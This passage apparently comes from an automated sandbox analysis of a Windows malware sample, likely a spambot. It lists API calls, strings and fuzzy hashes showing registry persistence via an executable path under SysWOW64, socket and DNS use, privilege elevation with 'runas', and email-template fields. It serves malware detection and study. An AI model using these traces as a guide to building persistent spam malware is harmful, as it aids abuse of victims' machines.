                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                        • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                        • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                        • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                        • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                        • API String ID: 835516345-270533642
                                                                                        • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                        • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 02D7865A
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 02D7867B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 02D786A8
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 02D786B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: "$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                        • API String ID: 237177642-3329995975
                                                                                        • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                        • Instruction ID: 1797055baf979b656e39225fcf5111d41cc7b9feff6d0bfc1f49e70a0bee97de
                                                                                        • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                        • Instruction Fuzzy Hash: 70C19371900249BEEB11EBA4DD88EEF7BBDEB04304F144066F605E6250F7788E94EB65
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,7591F380), ref: 00402A83
                                                                                        • HeapAlloc.KERNEL32(00000000,?,7591F380), ref: 00402A86
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                        • htons.WS2_32(00000000), ref: 00402ADB
                                                                                        • select.WS2_32 ref: 00402B28
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                        • htons.WS2_32(?), ref: 00402B71
                                                                                        • htons.WS2_32(?), ref: 00402B8C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 1639031587-0
                                                                                        • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                        • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 02D71601
                                                                                        • lstrlenW.KERNEL32(-00000003), ref: 02D717D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShelllstrlen
                                                                                        • String ID: $<$@$D
                                                                                        • API String ID: 1628651668-1974347203
                                                                                        • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                        • Instruction ID: a6b0cc6e309f42e7103ee249c7b4574f20d5b7503492eccf2063838b79e51845
                                                                                        • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                        • Instruction Fuzzy Hash: E0F16BB15083419FD720CF64C889BAAB7E5FB88304F008A2DF59997390E7B8D945CB66
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 02D776D9
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02D77757
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 02D7778F
                                                                                        • ___ascii_stricmp.LIBCMT ref: 02D778B4
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D7794E
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 02D7796D
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D7797E
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D779AC
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D77A56
                                                                                          • Part of subcall function 02D7F40C: lstrlen.KERNEL32(000000E4,00000000,004122F8,000000E4,02D7772A,?), ref: 02D7F414
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 02D779F6
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D77A4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "
                                                                                        • API String ID: 3433985886-123907689
                                                                                        • Opcode ID: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                        • Instruction ID: 6aa9ae0beb9d5bfc33b3263d46a89a50b2defd9d341e68676382b4bf0c5ac23e
                                                                                        • Opcode Fuzzy Hash: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                        • Instruction Fuzzy Hash: 08C19371900249AFEB21DBA4DC44FEEBBB9EF49310F1044A5E544E6290FB79DE84CB60
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,75920F10,?,75920F10,00000000), ref: 004070C2
                                                                                        • RegEnumValueA.ADVAPI32(75920F10,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,75920F10,00000000), ref: 0040719E
                                                                                        • RegCloseKey.ADVAPI32(75920F10,?,75920F10,00000000), ref: 004071B2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407208
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407291
                                                                                        • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004072D0
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407314
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004073D8
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                        • String ID: $"
                                                                                        • API String ID: 4293430545-3817095088
                                                                                        • Opcode ID: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
                                                                                        • Opcode Fuzzy Hash: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D72CED
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 02D72D07
                                                                                        • htons.WS2_32(00000000), ref: 02D72D42
                                                                                        • select.WS2_32 ref: 02D72D8F
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 02D72DB1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02D72E62
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 127016686-0
                                                                                        • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                        • Instruction ID: f4fb772eb9e362243b29045569ead51e20eaa37799438b2c4fe4ac061ddf8126
                                                                                        • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                        • Instruction Fuzzy Hash: 9061CE71904385ABC3209F65DC4CB6BBBE8EB88755F044819FD8497390E7B9DC80CBA6
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                          • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                          • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                          • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                          • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                          • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                          • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                        • wsprintfA.USER32 ref: 0040AEA5
                                                                                          • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                        • wsprintfA.USER32 ref: 0040AE4F
                                                                                        • wsprintfA.USER32 ref: 0040AE5E
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                        • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                        • API String ID: 3631595830-1816598006
                                                                                        • Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                        • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                        • Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                        • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll,759223A0,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                        • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                        • htons.WS2_32(00000035), ref: 00402E88
                                                                                        • inet_addr.WS2_32(?), ref: 00402E93
                                                                                        • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: GetNetworkParams$iphlpapi.dll
                                                                                        • API String ID: 929413710-2099955842
                                                                                        • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                        • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                        • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                        • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
                                                                                        • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
                                                                                        • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
                                                                                        • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,75920F10,00000000), ref: 0040688B
                                                                                        • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,75920F10,00000000), ref: 00406906
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,75920F10,00000000), ref: 0040691C
                                                                                        • CloseHandle.KERNEL32(000000FF,?,75920F10,00000000), ref: 00406971
                                                                                          • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                          • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 2622201749-0
                                                                                        • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                        • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                        • wsprintfA.USER32 ref: 004093CE
                                                                                        • wsprintfA.USER32 ref: 0040940C
                                                                                        • wsprintfA.USER32 ref: 0040948D
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID: runas
                                                                                        • API String ID: 3696105349-4000483414
                                                                                        • Opcode ID: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction ID: b6d0878b1d73306239325ce20442e1ed3f1d42e4277a972a89fda7ad6b3a58d4
                                                                                        • Opcode Fuzzy Hash: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction Fuzzy Hash: A7A181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 0040B467
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$wsprintf
                                                                                        • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                        • API String ID: 1220175532-2340906255
                                                                                        • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                        • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                        • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                        • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 02D7202D
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 02D7204F
                                                                                        • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 02D7206A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02D72071
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 02D72082
                                                                                        • GetTickCount.KERNEL32 ref: 02D72230
                                                                                          • Part of subcall function 02D71E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 02D71E7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: flags_upd$hi_id$localcfg$work_srv
                                                                                        • API String ID: 4207808166-1391650218
                                                                                        • Opcode ID: a6853c32b60f2cc87b9b05c4564022504dbed896d64d3d62fe446b684c9c1410
                                                                                        • Instruction ID: 072ab39fae460283a235dd4bf011c30df6964c9463fa879a5be80264dc2995a2
                                                                                        • Opcode Fuzzy Hash: a6853c32b60f2cc87b9b05c4564022504dbed896d64d3d62fe446b684c9c1410
                                                                                        • Instruction Fuzzy Hash: 7A5172705043446FE330AF658C89B67BBECEB55708F00496DF99682241E7BDA984CB75
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402078
                                                                                        • GetTickCount.KERNEL32 ref: 004020D4
                                                                                        • GetTickCount.KERNEL32 ref: 004020DB
                                                                                        • GetTickCount.KERNEL32 ref: 0040212B
                                                                                        • GetTickCount.KERNEL32 ref: 00402132
                                                                                        • GetTickCount.KERNEL32 ref: 00402142
                                                                                          • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
                                                                                          • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093
                                                                                          • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                          • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                          • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                        • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                        • API String ID: 3976553417-1522128867
                                                                                        • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                        • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                        • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                        • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                        APIs
                                                                                        • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                        • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        • Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                        • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                        • Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                        • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                        • ExitProcess.KERNEL32 ref: 00404121
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEventExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2404124870-0
                                                                                        • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                        • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                        APIs
                                                                                          • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                          • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                        • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                        • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                        • GetTickCount.KERNEL32 ref: 0040C363
                                                                                        • GetTickCount.KERNEL32 ref: 0040C378
                                                                                        • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                        • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
                                                                                        • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1553760989-1857712256
                                                                                        • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                        • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                        • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                        • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02D73068
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D73078
                                                                                        • GetProcAddress.KERNEL32(00000000,00410408), ref: 02D73095
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D730B6
                                                                                        • htons.WS2_32(00000035), ref: 02D730EF
                                                                                        • inet_addr.WS2_32(?), ref: 02D730FA
                                                                                        • gethostbyname.WS2_32(?), ref: 02D7310D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 02D7314D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: iphlpapi.dll
                                                                                        • API String ID: 2869546040-3565520932
                                                                                        • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
